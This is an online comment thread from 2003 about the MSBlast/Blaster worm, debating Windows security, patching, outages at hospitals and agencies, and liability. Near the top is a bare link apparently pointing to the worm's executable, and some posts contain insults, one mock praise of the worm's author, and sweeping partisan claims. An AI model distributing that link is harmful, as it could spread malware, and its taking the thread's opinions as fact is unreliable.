That and security is a process, not a bandaid..
www.unixwiz.net/misc/msblast.exe
Viruses are no longer spread by floppy disks but instead come into your computers.
Philly may blame Symantec for the virus but are they truly responsible? I doubt it. More the blame should be pointed to their chief of IT for allowing those specific ports to be open.
Any IT chief worth his money would know the advantage of having all outside network facing machines not run any MicroSoft OS and instead rely on Linux to handle those functions thus providing a barrier beyond the firewalls to keep viruses out. In today's age it's just not a good idea to have any MicroSoft equipment as any network edge service.
Also it's obvious that the line by line review of the OS code has done nothing to alleviate these problems. This is the 3rd virus in the last 2 weeks to hit Windows and many times the AV companies take upwards of 24 hours to produce new definitions to block the viruses themselves.
It's SkyNet! SkyNet is the virus!
*makes some popcorn and waits for the nukes.
- "Scientia non habet inimicum nisi ignorantem"
The debit machines in British Columbia are screwing up big time right now August 12. A Safeway employee told me it is because of server outages. Boy this is starting to cost big dollars. At least ./ still runs. You guys cash my check? At least I can still rant on line.
OH THE SHAME I fell off the wagon and use sigs again!
MOD PARENT UP
You really think things would be different if Linux ruled the roost? What was it that really made the worm possible? The ability of Microsoft's programmers, or the apathy of their users? Like the latter doesn't exist in linux space as it is, and like the apathetic people would suddenly become attentive with the fresh ground scent of linux lingering in the air.
The bitch who wrote the worm and all the little bitches who spout off the same drivel in a non-destructive manner, are just as guilty as Microsoft's apathetic users. They didn't think things through either. And so are equally deserving of serving as slave labor in the insect overlords' sugar mines.
Much like everything else, too much of anything isn't good. Just as a homogeneous population of anything is vulnerable to having a significant pressure, such as a virus, bacteria, or in this case worm, bring it to the precipice of disaster so it is with a near homogeneous population of software.
Or maybe you were just whoring karma?! In which case, you gotta get in on that early, as it goes pretty quickly.
The windows world isn't even close to handling a whole class of vulnerabilities - services running with inappropriate privilege. Ouch! No chrooting, privilege separation, etc.
It's amazing how little they seem to learn from better OS's. That and your point reminds me of a sig I saw a little while ago: "If I am near-sighted, it's because I stand on the shoulders of midgets."
Windows *is* fundamentally insecure, and much more so than Linux. If you don't see this you know very little about computer security.
It has nothing to do with 90%, it has nothing to do with people not patching because they are technically incompetent, IT IS BECAUSE WINDOWS BY DEFAULT RUNS A SHITLOAD OF NETWORK SERVICES AND DOESN'T FIREWALL ANYTHING.
In case you didn't catch that, let me repeat:
IT IS BECAUSE WINDOWS BY DEFAULT RUNS A SHITLOAD OF SERVICES AND DOESN'T FIREWALL ANYTHING.
Run a netstat on a default XP install, and count the open ports. Now do the same on a default Linux (RedHat/Mandrake/Deb/you name it) install and count the open ports. You'll notice a 2:1, 3:1, as high as 10:1 ratio, Windows:Linux. Ok, so by default Windows has many more open doors. Huh, wonder why it gets exploited so often.
Unfortunately, that's not the end of it. Most Linux distros I've seen (fellow slashdotters correct me on this stuff) are now using IPtables by default, with at least a level of security that blocks incoming connections to almost everything. All you have to do in some is select 'high' security, and bang, almost nothing gets through.
Windows by default has no firewall enabled. In fact, you can't do *anything* with pre-XP Windows. Linux has had built-in firewalling for years and years and years...
This is all bad, but it gets worse. The latest worm attacks the RPC service in Windows. Now, logically, you'd think you could shut off an RPC service, if you're never making/receiving REMOTE PROCEDURE CALLS. Nope, the OS breaks pretty nastily if you do that.
I have yet to see a single example of a listening service on a Linux box that cannot be disabled without wrecking the OS itself.
This has nothing to do with patches, volume, or the price of tea in China. Windows simply uses a poor security model, one based more around convenience than intelligence.
I really don't get the massive amount of Windows apologists on Slashdot, either. I personally love Windows for what it's good for, but a simple 5 minutes research into TCP/IP will show anyone just how poor the security model is in Windows. Yet you're modded up with 100% complete nonsense.
Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
I'd like to take this chance to show the MVA and the slashdot crowd the status of my carefuel
E\....F
there you have it
-foxxz
And exactly how much did our government recently pay for MS software to be used for homeland security.
He who said 1,000,000 monkeys on 1,000,000 typewriters would eventually type the great novel, never saw an AOL chat room
Windows XP, and XP SP1 are vulnerable. Windows 2000 SP3, and SP4 are vulnerable.
I have a computer running Windows 2000 as a router (no flames... please), with no Service Packs installed. My router has direct internet access. It has NOT been hit.
The theory that for every bug MS fixes, they add 2, is true.
Wouldn't they have to use Windows in order to test their virus as they develop it? :)
Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
Is it really fair that literally millions of $'s of business and government money and hundreds of man-hours of time must be lost due to Windows worms and virii??
Shouldn't MS be held accountable in some form or fashion for these costs?
This is utter madness!!
I like the text in the worm though (from the symantec site) "I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!" LOL.
Well Bill? What say you? Can I call you when my father-in-law calls me all confused (again) because he has "this windas erra that won't let me work on my files". Grrrrrrr.
I SAY WE FORCE MICROSOFT TO CREATE AND MAINTAIN ANTI-VIRUS SOFTWARE AND HOLD THEM ACCOUNTABLE FOR MISTAKES. Oh wait...*slaps forehead* that's not a good idea either.
Is the juice worth the squeeze?
Yeah, since Linux is 100% bug free, and Microsoft didn't release a patch for this exploit already.
Oops, both of the above ideas are FALSE.
Hey hopefully Md will switch to Linux, and the same Admins who didn't patch the Windows bug won't patch the next Linux bug either, and they'll go down again! *omg*!
Not everyone can afford real IT staff, and for that matter not everyone ought to have it.
What we call folk wisdom is often no more than a kind of expedient stupidity.-Edward Abbey
I work for a healthcare organization and it was indeed pretty bad. Our desktop folks had gotten behind on their testing of security patches, so many of our systems were unpatched. All it took was one connected clinic to start it off and pretty soon routers started shutting down due to the huge network traffic as the worm spread.
It was pretty freaky. My coworker was patching systems in the Emergency Department as patients started getting some long wait times. Downtime measures tend to be slow in comparison to what people are used to.
If the worm we got autostarts anything, it uses one of the sneakier methods. I didn't check the ini files, but I did check out both run and both runonce keys and there was nothing unexpected in any of them. File sizes and dates on the files that were there matched a clean system (although that's not a guarantee, I didn't run checksums). The damage to explorer, IE, and Word did survive a reboot, however, so it modifies something on the system. We had the system up for the better part of an hour on the network, watching ethereal on the switch's mirror port, and didn't see any strange traffic, so I don't know what triggers its spread. The dial-in client that was one of the original vectors had been connected for something like 8 hours when it started scanning, and we are its internet access so it couldn't have been (easily) infected from outside today without us seeing it (we were monitoring after central's exchange server went boom), so I strongly suspect it's got a timer or trigger to start scanning. (Maybe idle time? It started roughly half an hour after they closed for the night, hence us kicking them off and revoking their dial-in privileges instead of just calling them.) I didn't catch any actual infections in the packet dumps, only scans after the vulnerable machines had already been hit, so I don't have a network dump, but I'll hook an infected machine to the test network in the morning and try to get one. If I can talk the manager into leaving me alone for long enough I'll try to get it to infect a dummy machine I've imaged and see exactly what changes it makes. Anyways, good luck to anyone still playing with these things.
No problem, Sir. We'll just switch our AI on and squash this thing. Skynet is ready to go live.
Am I the only one who heard Roxette to sing "I'm gonna get blitzed for some sex"?
Extensive hits to e-mail, web and database systems throughout many ministries in Ontario.
I thought it was interesting that a member of the Justice system in Ontario was complaining that 'Microsoft is not providing the proper tools to properly manage an enterprise with 1000 servers spread throughout the province and ensure that patches and service packs are kept up to date. The cost of maintaining these manually is too high'
To which I asked 'How much is it costing you to scramble and fix this problem now?'
Enterprises either need to bear the cost of a 3rd party tool to maintain patches through the enterprise or find the money and resources to keep things up to date properly on an ongoing basis. Otherwise, they will find it costs 2-3 times that amount of money to respond to patching and cleaning large pools of servers in this type of worm situation.
The1Genius - Littera Scripta Manet
One of the issues we face is that every single security patch needs to be tested against a huge array of applications installed on our desktop systems. While it's a simple rule to always update Windows to the latest patch, it can be troublesome when mission critical applications fail as a result. And when you're in the healthcare business, failure is not an option.
when will the government sue microsoft over this? when can we get a class action suit, against microsoft over this? in the end, someone is going to try to do it, with some angle.. but really, is it even possible? all win installations need you to agree to the EULA, so really there HAS to be something in there preventing you from suing for damages, no?
why the hell would you use windows when lives are at stake? That IS criminal negligence. I'm NOT kidding. This ISN'T FUD. Viruses like this are PROOF that running microsoft when lives are at stake is a bad idea. Could you imagine if ATC ran on windows 2000? I want to know EXACTLY what hospitals you have windows servers in so I NEVER end up DEAD there.
One of the reasons that this patch may not be installed everywhere, besides the obviously long QA side of testing patches before deployment (I was burned by SP3 and a Promise IDE controller) is that it is pretty far reaching. Any game house or animation company for games like Quake or UnrealTournament2003 will probably not have applied this patch. Reason: It made it so they could not open any of the files made in gmax
But then the issue is one of resources, pure and simple. So when government agencies and public institutions (like my buddy's university) have their networks go down, this is a direct result of underfunding. And underfunding is your tax cuts at work (your jurisdictional mileage may vary).
The other issue at work here has to do with the fact that with lots of worms and trojans, an unpatched or infected box on one network can cause major headaches for all sorts of other networks. And this raises two interesting, related issues: first, can the owner or admin of some unpatched system be held civilly liable for negligence if it is infected and used by a worm or trojan that damages other networks, and secondly, will governments start regulating or setting standards for internet-connected servers, to protect the viability of the network as a whole. Regulations or standards might not be such a bad thing either, because they'd act as a shield from litigation, insofar as any company that followed the guidelines could probably claim that they'd practiced due diligence, or weren't negligent, or whatever (IANAL, can ya guess?). It seems vaguely analogous to environmental regulation, in that if you're going to put your mill by the river, it better not muck the river up for other users.
This all boggles my mind. Yes there are security risks involved with any product that features to make life easier (the more security something has the less 'user friendly' it is), but do they just have servers/multi-homed machines sitting on a live, unfirewalled connection and on their internal network as well???? or (even worse) are these machines firewalled and have port 4444 open????
and for the CEO that bought the virus in on his machine (forget where that was mentioned) his IT guys should be shot for allowing a machine that obviously travels from work (should be secure) to his home DSL/cable connection to not have any sort of virus protection on it (or at least not having it scheduled to update often)
when I was asked about if we were at risk because of this at work I had to laugh, as none of these ports would even be considered to be opened, especially 4444 inbound!!!!
sure these viruses exploit holes in OS security, but they should have been covered off by network security!!!
just my 0.02 cent Canadian =~$0.013 USD
Black Ice Defender
Zone Alarm
Oh you mean why didn't they bundle a free one?
Well since Microsoft tweaked free code bought and paid for by taxpayers and gave it back to their customers for free, and then found out that was illegal, I'm not so sure they'd be so quick to so flagrantly dare the states to sue them again.
Probably why the XP personal firewall is so limited. But there's always IAS!
A friend in the 3rd Circuit Federal Appeals Court -- located in downtown Philadelphia -- faced an outage this morning. No computers for an hour and a half (at least).
Take a company like JetBlue. 100% Windows-based airline. They never have a problem, because their people know what they are doing. There are thousands of other companies with good people, but even more that are just lucky, and on the road to disaster.
It should be written into every IT person's job offer, that if the Windows network brings down a company because of a virus, they can expect immediate termination.
Fortunately for me, Win4Lin only works with Win98/ME which doesn't have this RPC bug.
Oh well, what the hell...
Zzzzz...nnngg...huh? wh...What? A virus?
Oh, never mind. I switched all of our company's systems over to Linux months ago. I can rest in the fact that the world around me may be burning down from another brain dead defect in Microsoft's crap code, but I am blissfully unaffected because Linux is secure.
Yeah, that's right, secure. For those of you who say Linux is just as bad as Windows, you keep telling yourself that tonight when you're up patching systems.
(sigh) Hmm. I wonder what's on TV tonight?
Ruby on Rails Screencast
Comment removed based on user account deletion
Wouldn't they have to use Windows in order to test their virus as they develop it?
;)
Nah, the WINE project is becoming such an accurate implementation that you can actually develop viruses under it
The unofficial
I was setting up a new computer today running Windows XP and within 3 minutes of the first boot, the computer was infected. I wasn't even able to download the updates before the worm found this machine. So my question is, why are machines still being shipped with vulnerable versions of Windows XP? If it is too expensive to redo the drive, at least include a cd-rom (that costs $0.00001) that has the updates on it.
agree that this is a disgusting act of vandalism and the person who wrote and/or spread the worm should be punished heavily if caught. This worm knows no boundaries, and unlike a email virus, it could cause tremendous damage and is far more malignant, therefore the intentions of its creator. RPC flaws are not new, they have existed in the Unix world for a long time, and now Windows is the next victim. I used to have respect for hackers who deserved respect, but as someone whose life is computers, I have lost respect for these people completely, and I hope they get caught and punished. This new breed of hacker is neither truly intelligent nor has any intentions to teach people a lesson. All they care about is do damage. Assholes.
The phaomnneil pweor of the hmuan mnid. Fcuknig amzanig eh!
Sorry, but the author is obviously not a Linux user. If he were, the virus would also DDoS sco.com.
Litigious bastards
being a hacker is a good thing, don't feed the FUD. read here
bite my glorious golden ass.
Here is a little something that you may or may not find slightly hilarious:
Word of fore warning - I am typing on a ONCOMMAND keyboard (hotel web TV) that is probably covered in beer and man glaze.
I had a mysterious reboot one night when trying to access the "High Speed Suck-O-Net" That they try to charge $10/night for. After 13 hours of updating MS systems at work I wrote it off as "one of those things". Now I am starting to have second thoughts.
I can't use the internet in the hotel on my computer because every time I do I get the "NT Authority/System RPC service terminated unexpectedly" then my Windows XP laptop (wasn't it supposed to be more secure?!?) shuts itself off. Not only that the phone stopped working next to the bed, the receptionist downstairs thinks I am crazy for bitching about worms (how can worms get on the tenth floor?), this keyboard sucks and my computer is infected with a DAMNED VIRUS that has already cost me $10 for the initial infection! I would like to find the ASSHOLE that wrote this POS and give his ass an unexpected termination!
Seriously though,
Why can't someone write a virus that gets into these ONCOMMAND systems (run on MS (P)OS) and tell it to give everyone free porn? I would pay for it but I am afraid my TV will shut off half way through due to some bug and I would have to make the rest up!
I probably would have been able to respond to the 15 minutes of warning had I not been patching other vulnerabilities these bastards keep finding.
BTW - I proudly run OSS for several of my (stable) servers but I am not in MY office, I am in a pure MS network. I will now be infesting it with a new "virus" according to the all knowing MS. it's a little thing called Linux, anyone heard of it?
Well I suppose I should get some sleep as I will have a couple hundred machines to clean at 6 AM and it's now 12:30. Off to bed where I shall dream of worms crawling through my head!
The dingo ate my sig.
I can imagine the day when the unknown security hole of the future comes careening through that expansive windows network and microsoft hasn't made a patch yet. I wonder how long before someone dies. Nothing personal, but I'd never consider Windows 2000 secure enough to bet my life, or anyone else's life on it. No FUD intended here. I'm being as serious as a heart attack. I'd go so far as to say that putting mission critical hospital systems on the Windows 2000 platform is criminal. I'd never trust my life, or a loved one's life considering their track record. And yes it IS that big of a deal. And it IS that serious. What you are describing is a serious tragedy waiting to happen. It's only a matter of time.
For every annoying gentoo user, are three even more annoying anti-gentoo crybabies. Take Yosh from #Gimp for example.
I was at the gym for the 3pm NZST news today, and Microsoft took a hammering. Only Microsoft Systems are affected... MSFT this, MSFT that - I'd like to see what Microsoft New Bliss-Land do to spin this.
I've just checked their NZ home page and they are soliciting for feedback on customer feelings towards MSFT today, and have some obvious customer advice in big, bright colours. Microsoft US doesn't seem to care in comparison.
The feedback form has three cute faces with various different states from happy to angry on them. Perhaps you may want to give them some feedback too ;)
So my question is, why are machines still being shipped with vulnerable versions of Windows XP?
because it would cost them (PC manufacturers) lots of money to stop shipment on all those systems and reimage them all over again. they would be glad to toss a CD in the box if they kept track of which hard drives were in which systems, but they don't. honestly, just make your own damn cd. it will work until the next service pack is released, and then you'll have a brand new office frisbee to play with. you can't lose!
Protector of Capitalist views,
Meorah
Getting hit by this worm demands complete apathy towards patching your system. One faculty member at the University I do tech for was complaining about doing patches. It's so hard to open IE go to tools and then Windows Update and click a couple buttons. If that. We tend to set Windows to automatically download and install critical patches and then cross our fingers and hope the users are too lazy to disable it.
In my case I just run a $50 router with NAT that blocks everything I don't need which makes the entire house network of around 10 computers immune from this worm regardless if they're patched or not.
This worm doesn't prove anything. Linux users need to be patching their systems as well and when it becomes mainstream it'll be the target of script kiddies as well. It's just pointing out what techs all know: people are lazy and don't care until it's a problem.
Ben
Work Safe Porn
In all seriousness, the automatic updater should be running on ALL home users systems, and system admins can set it to "prompt before downloading AND prompt before installing" so that you can cancel or delay if need be (for whatever reason.. testing, etc).
Has anyone compiled a list to see something like how much M$ has cost the world due to insecure software?
I would guess it's a couple billion dollars by now. Why does no one care?
You nailed it right on the head, pal. I've been saying this many times, but you've mastered it in your clear, concise comment.
Congrats!
Lee Nooks.
What was it that really made the worm possible?
Leaving RPC open by default. As much as I like where you are trying to come from, this is indeed a Microsoft problem that they created themselves. When you have 50 FUCKING BILLION dollars in the bank, a major majority of the market, and this type of crap keeps happening, you should probably think about spending a few billion on making products that don't cost your customers insane amounts of money and lost productivity due to down time because of pathetic security and coding practices. It's just a thought.
For every annoying gentoo user, are three even more annoying anti-gentoo crybabies. Take Yosh from #Gimp for example.
Wow MVR's would be fun to have control over
You're fired !!!!!!!!
They did it because they love San.
But there is a world of difference between pedantic and erudite. Good luck with that in the future.
YOU only THINK that windows update is good and paranoid neurotics are bad because you turned on windows update and allowed MS to indoctrinate you with lengthy dissertations on the evils of paranoid neurotics and the benefits of windows update. this feature flashes the information on the page once every 30 frames, and was ironically installed by the windows automatic update feature.
Protector of Capitalist views,
Meorah
Remote Procedure Call (RPC) is a protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that allows a program running on one computer to seamlessly execute code on a remote system. The protocol itself is derived from the Open Software Foundation (OSF) RPC protocol, but with the addition of some Microsoft specific extensions.
So now can they shift some culpability to the OSS community?
geez.... the audacity.
-Phil
"'Tis a small mind indeed cannot think but of one way to spell a word." -Mark Twain
just getting sick of, "good, that will teach them, hahaha" "it is their fault for running M$". That is bullshit and you know it.
So true. It's not a haha funny thing at all. It's more of a "why do these dumbasses keep using windows for mission critical things. It is their fault for installing windows" if anything. It's a serious and disturbing thing.
To the person who wrote the virus -- We know you are reading this forum. We just want you to know that we appreciate your fine efforts at destroying the mega-monolith. You are a hero to us, and we will always hold you dear to our hearts, as dear as you hold San!
but true, oh so true.
> you don't want this kind of rubbish, don't use Microsoft.
something that is obvious and that all agreed on
should not be treated as an insightful comment.
The responses on this topic could have only been worse had 99% answered "I agree....Me too...Uh-huh" or similar.
"Doctor, Doctor, it hurts when I lift my arm like this"
"Don't lift it like that then."
yes it will. there's a windows emulator called wine available here.
If they had spent 20 billion on making sure their products didn't COMPLETELY FUCKING SUCK instead of putting 60 billion in the bank, maybe we wouldn't be fucked over by their shitty software all the time.
This is funny. An exploit comes out, MS puts out a patch, /.ers bash MS for not having it out in time. An exploit comes out, MS puts out a critical update weeks ahead of time, /.ers bash MS for needing a patch. A script kiddie brings Windows to its knees, /.ers say it's ok because it was MS. A script kiddie attacks *nix, /.ers say "OMG they killed *nix! You bastards! Oh well it will be back in the next patch."
An exploit comes out for *nix, they put out a patch, /.ers praise them for patching it even if it comes out after the exploit has been used to vandalize *nix systems.
This attitude makes me hate *nix with a passion. If it's so great then learn to program and help them make my applications run on it. I have 2 flavors of *nix running at my house and I use the Windows machine 99% of the time.
Two roads diverged in a wood, and I - I took the one the bus load of girls just went down.
People don't want ease of use, they want something that does the work for them, or that they can blame for not working.
And over all they don't want to remove their fingers out of their ass to learn just a little how things are supposed to work (like... let say learning to drive cars)
When you try to explain something they immediately bitch by saying they are not computer technicians... they just want the work done, without knowing anything about how to do it...
I don't want to troll... but it's difficult to blame the last virus for not being on time for a project when you are on something else than windows.
way to bash microsoft with the "microsoft is trying to control you" argument and skip over the actual discussion.
How many Windows users actually use Windows Update?
I'm convinced that most regular users do not "get" what Windows Update is for, and see no tangible benefit to using it until/unless their system crashes. It's a bit like backing up the hard drive -- most people won't do it until a bad experience convinces them it's worthwhile. (This goes double for dial-up Internet users, who have to babysit giant downloads, and may have to start from scratch if they get disconnected.)
I think Microsoft needs to add some kind of positive reinforcement and explanation of the value of the Windows Update service. Even a big splash screen at the end of each update that says "Your computer is more secure!" would be an improvement.
In my experience, Windows Update works pretty well in Windows XP. Updates can be set to download and install automatically, or download then notify, or simply notify when updates are available. The system works.
By my very unscientific reckoning, however -- based on the visitor logs on my Web site -- the latest Windows (XP) accounts for just 50% - 60% of current Windows users. 20% are still running Windows 98 (and 20% are running Windows 2000).
Why does that matter? Remember that Windows Update in Win98 was not automatic. In fact, it often completely failed to work!
Many of today's users had at least one bad experience with Windows Update before Microsoft got the bugs out. (You might recall that the Win98 version had several "known issues" including the infamous "freezes at 0%" problem that completely prevented users from accessing the update system.)
Microsoft also alienated some users in the early days of Windows Update by marking unnecessary (even unwanted) system software as "Critical Updates." If I remember correctly, version 1.0 of buggy and bloated Internet Explorer 6 was installed as a "Critical Update" to IE5.
In short, Windows 98 users who tried Windows Update learned these lessons:
- Windows Update doesn't work very well (or at all)
- the updates do not appear to make any difference
- Microsoft uses this system to force unwanted software on me
It's no wonder many Windows users don't bother to fire up Windows Update. And as long as some Windows users are apathetic (or actually hostile) towards the update system, EVERY Windows user is vulnerable.
(A brief digression: users who have dial-up Internet accounts are less likely to use Windows Update than broadband users. They would need to see some major tangible benefit to keeping their systems up-to-date. Big downloads are relatively painless with broadband, but they're a major hassle for dial-up users -- especially to anyone who pays by the minute to be connected.)
Anyway.
It's clear that automatic updates are the way to go. Microsoft could easily fix the whole problem by issuing free software to make "Critical Update" downloads automatic in older versions of Windows. That would eliminate a major reason for upgrading to XP (i.e. because Win98 is insecure by default), but it would benefit ALL Windows users.
But there's the rub: this would eliminate a major reason (perhaps THE major reason) to move from Win98 to WinXP.
I spent more than an hour on the phone today with a friend whose Windows XP system was infected by the Blaster worm. She thought she was safe -- she has anti-virus software, she updates her virus definitions daily, and she thought she was using Windows Update regularly. (She was wrong, as it turns out -- Windows wasn't up-to-date, although she swears she said yes to automatic updates sometime last week.)
If a bright, conscientious, well-meaning user can get burned by this system, there's something wrong.
Solutions? I think "Critical Updates" should be mandatory for all Windows users. If people refuse to update the updated system software, Windows would shut down after a reasonable period of time -- say 30 days -- until the user agrees to get the Critical Update.
Another idea: write and distribute th
That new virus that's out, it wouldn't be called Service Pack 4 by any chance, would it?
Uhhh... Don't you have to actually load Windows inside any of these emulators??? Doesn't that mean you are USING Windows to test the virus?? dumbass
Not a bad idea until you get the prissy programming dept that can't have their sacred cow of a test server touched or the VP of sales that needs to bring his plague ridden network onto the network and refuses to lose admin rights and the ability to override virus software.
Now granted mostly I'm a consultant so I actually suggest the right course of action; sometimes I win and other times expedience and bad attitudes win, generally from the non IT department. Things in midsized shops like "you mean I can't have local admin, period? But I'm a programmer, I need local admin to install things", or the high and mighty sales guy who needs to open exe's from his email to do his job (yea because people always send each other .exe's in email) granted he clicks on everything presented that looks official.
No sir I dont like it.
http://www.dslreports.com/forum/remark,7652257~root=security,1~mode=flat
I hate to have to say this to you guys, but the only reason Microsoft is having all these exploits published for their OS is the fact that they control most of the market share!
If linux starts to become prolific, you know what? People are going to start looking harder for worms and I can guarantee you that the same amount will start coming out for that OS.
I'm going to have to sit on the other side of the fence for this one boys and girls. I don't think that this shows that Microsoft's OS's suck, it just shows that they are the best target.
*gasp*
"Where the hell is Linux Solitaire?! And I can't seem to find Minesweeper either..." =(
That's why the section of the MVA (not the DMV in MD) that I work for keeps paper backups of everything. Oh, wait, nothing is kept anywhere but paper. Funny thing, paper. Seems to have been working pretty well for a couple of years.
(My latest journal or two should describe my 'work' with the MVA. Lots of outside work, and a shoestring budget. Using laptops or some other techno-trash isn't going to happen. But, again, we'll be working.)
The only crappy aspect is that who knows whether or not this will delay a paycheck:(
Jesus was all right but his disciples were thick and ordinary. -John Lennon
uses Solaris in ICU. DOS is used in admitting, and the drones use Windows.
"I am sure the "haxor" would have been really proud of his/her self if he/she proved their point by porking say a hospital's computer system. What an asshole."
Let us not forget that there are people who are out to disrupt government operations and injure/kill people in hospitals.
Why does everyone assume that this is a "script-kiddie" sitting in their parents' basements writing worms? There are plenty of evil/sick people who would love to see communications disrupted so they can hurt us economically and possibly physically.
"A plan fiendishly clever in its intricacies"- Homer Simpson
I had not heard any claims of a complete rewrite. To me, it looks like warmed over nt4 with the substantive changes divided being cosmetic, gratuitous UI alterations (so the admin applets are in a new spot, just to annoy) and more radical new ways for other machines to interact with the system.
A little hardware support - they had a USB driver for nt 4 widely deployed all over the redmond campus, but not released so users would have a reason to buy a new os.
I don't know if it is better code/design than nt 4 or better drivers or my anecdotal impression of better stability is incorrect. I think security is worse.
XP added a lot of lines to win2k, but it still uses a lot of the same crap.
In the consumer OS evolution, there wasn't much difference between win95 osr2 and win98. Throw in some patches and you have a more complete evolutionary chain than we have for human descent. Which is another way of saying we all got charged for bug fixes.
Your left eye involuntarily twitched while you typed all that, didn't it?
Seek help, dude.
Like the subject asks, are systems behind NAT safe? I would guess that it cannot connect to local IP addresses behind a NAT router/modem. Or am I wrong?
So, as a Philadelphia area resident can anyone get me a list of infected business/departments so I can fill the positions of the soon-to-be-fired IT Staff?
Yes - I am partly serious.
Admins should patch, no question. And there are some basic things we should all do no matter what platforms we use. My net does not allow outbound packets unless the source address is our net. That kind of thing.
I guess I think it's reasonable to get caught flat-footed once in a while by this stuff. Even the microsoft download site - where you could get the patch to prevent Code Red - was itself nuked by Code Red. If they can't do it all the time, it's not reasonable to expect everyone else to.
I think the real solution is to migrate to better platforms. "Better" includes considerations besides how fast a half-trained web lackey can smack out a superficially functional .asp page.
I don't know how the liability would play out. Seems it's hard enough to punish deliberate, manual crackers and fraudsters, even when you locate them for the authorities. There's been enough of this stuff that to my mind the common custom ==> common law is that you don't have grounds to sue, since millions of people haven't. Dunno. And if you got infected, aren't you guilty of the same negligence? I suppose if you got hit with a side-effect, like the DOS that will hit the Windows Update site, that's different.
She said he got demoted to mere lead programmer or something around nt 4.0. MS has a weird habit of giving 25 year olds executive authority over some major projects. The PM's were not the best coders who had been promoted.
On the other hand, they sometimes value the programmer much more than the programmer's supervisor. The place is a political snake pit, but they do avoid some Peter Principle issues.
Anyway, she noted seeing his sports car (ferrari?) in the parking lot on weekends when she was about the only other person there. He worked long hours even after NT went someone else's way.
if this person ends up in prison they'll be much more popular with NO teeth.
But.. they too would be a Windows user!!
Unless they skipped the whole QA portion of programming and decided not to test it on their own Red Lan systems...
That we may never get rid of this worm completely, at least not for a long time...
Patches for the hole, except for Windows NT 4.0, which the company no longer supports, were put online by Microsoft.
Source: Channel NewsAsia
There are A LOT of companies still running NT on both servers and workstations, last time I was in a major server room at Big Blue, well I won't name clients, but several large name clients have NT based server solutions. Yes I know blocking certain ports will stop it from getting in, but there is still potential for many NT systems not to have those ports blocked now, or in the future.
The fucking patch did not work. I have been awake all night trying a new version of the patch and applying work arounds...
IANAL but write like a drunk one.
please lower your threshold before posting
Apache is mainstream, IIS gets trashed.
That should be enough to prove how deeply flawed is the "if it is mainstream you will be 0wn3d" mentality.
IANAL but write like a drunk one.
However you are essentially right, to create a dcom function exe you need to use MS script libraries that only run on the MS Visual Studio compiler set. To my knowledge I do not know of anyone who has made the MS compilers run under Wine. It would run like a dog with a broken hind leg anyway, and most likely would not get anything compiled into a binary. No, whoever built MSblast.exe used an MS compiler. That is almost for certain.
OH THE SHAME I fell off the wagon and use sigs again!
> I say screw those who didn't patch
/insert obrant about how Windows is a poor system in regards to security and how patches and virus scanners are post-attack fixes. Someone has to get infected first you know. //or insert obrant about how Bush's DOJ let MS off and now we are sowing the seeds of cronyism.
1. Companies may still be evaluating it before putting it on their production servers. So if their e-commerce site went down because of this patch would you also say "screw them for not testing properly?"
2. "Road Warrior" laptop users who tech support hasn't had a chance to update yet.
3. Home users who dutifully update their virus scanners, pay Norton, and are careful not to open wacky attachments but have no idea about how remote exploits worked.
4. Failed patches and false positives.
5. New computers straight from dell or whomever that bundle and auto-setup everything except autoupdate. Hmmm, that sounds like a big problem to me.
6. "Early victims" who were infected well before the patch was available or before their computers could download it automatically.
7. The technically clueless that have no idea what a virus is, let alone what a worm is. Whose job is it to teach them the ins and outs of security? Maybe MS could make a more secure product or at least put as much effort into alerting the user about security as it does trying to break competitors. Crazy, I know.
You must be young. "Virii" are almost exclusively a Microsoft phenomenon and have been since Microsoft had very small market share due to the poor security and "always root" nature of the OS. You are trying to use windowspeak to describe other things. The only significant UNIX worm was the sendmail worm. Other than that, there hasn't really been much. There was the DNS/Bind worm a little while back, but it didn't propagate nearly as fast due to the increased diligence your average UNIX admin has compared to the typical "set it and forget it" attitude that's popular with the windows family of server OS's. Growing up during the time, problems with "trojans" and worms and whatnot were never really that big of an issue with UNIX because the barrier for entry was enormous. You had to understand a great deal about C, socket code, and other not easily obtainable bits of knowledge to even begin. Most "hackers" weren't malicious when UNIX ruled 90 percent of the roost. Only with the coming of Microsoft did the true rise of the "script kiddy" occur. When it became easy for any moron to download precompiled crap and run it on their windows box to attack other windows machines is when there was truly "TONS" of this kind of stuff. Very sad, but very true. Windows is a target because it's a very easy target. These people are lazy. Windows is shooting fish in a barrel compared with having to deal with obtaining root permissions, or the ridiculously rapid rate with which UNIX systems are patched, and get patches. With most UNIX systems, a patch is out in HOURS as opposed to weeks or months with microsoft sometimes. There is a fundamental difference in how things are done in both camps. Microsoft could learn a great deal from UNIX if they'd bother. They only have about 50 billion dollars to spend on making their systems better yanno. I'd think that would be pretty obvious to even the most biased sympathizer.
For every annoying gentoo user, are three even more annoying anti-gentoo crybabies. Take Yosh from #Gimp for example.
Apache is the most popular web server. It gets hammered harder by the script kiddies than IIS.
Who installed the logic module in your brain?
IANAL but write like a drunk one.
I'm a sys admin for a hospital, we simply don't have the funding for nice stuff like that or enough IT staff. We just gotta make do with what we got.
Please use the correct terms, we are supposed to know the lingo.
IANAL but write like a drunk one.
What makes you think it's real money. Have you seen it?
Or is it an urban legend built on Enron-style accounting practices?
The ability of ms programmers should be commended. Like clockwork they ensure people must update their software every week and upgrade it every couple of years.
This business strategy of having your customers depend on you to prevent these pathetic hacks works well for them. What other company in these times has $50 billion in cash?
The only thing that can help or even fix this is competition. We all know that's not going to be from apple anymore, so maybe linux.
The worm contains the following text, which is never displayed:
So it seems the creator did have a point to prove.
How could I say to men: "Speak louder, shout! For I am deaf!"? -Ludwig van Beethoven
...we will see some kind of press release from SCO reminding us how bad IBM & Linux is, just to help divert our attention away from the current chaos of this Microsoft worm.
:)
Just one for the MS/SCO conspiracy theorists
"Hey! Unless this is a nude love-in, get the hell off my property!!"
Get it through your thick skull. You're a no talent, fucking moron. You never had, don't have, and never will have any skill on this website. It's better for you to just leave while we are being so polite. It will get much uglier, believe us.
IIS is a Swiss Army knife.
I run Apache precisely because it doesn't do anything extra. Lack of functionality doesn't make it more secure than something of greater functionality. It's apples and oranges. As someone else mentioned, Apache has modules that open up the same/similar vulnerabilities as IIS.
IIS gets hacked from remote administration exploits and the fact it's tied in to the OS. Which is precisely why I dumped Linux which stupidly ties in FTP to the OS.
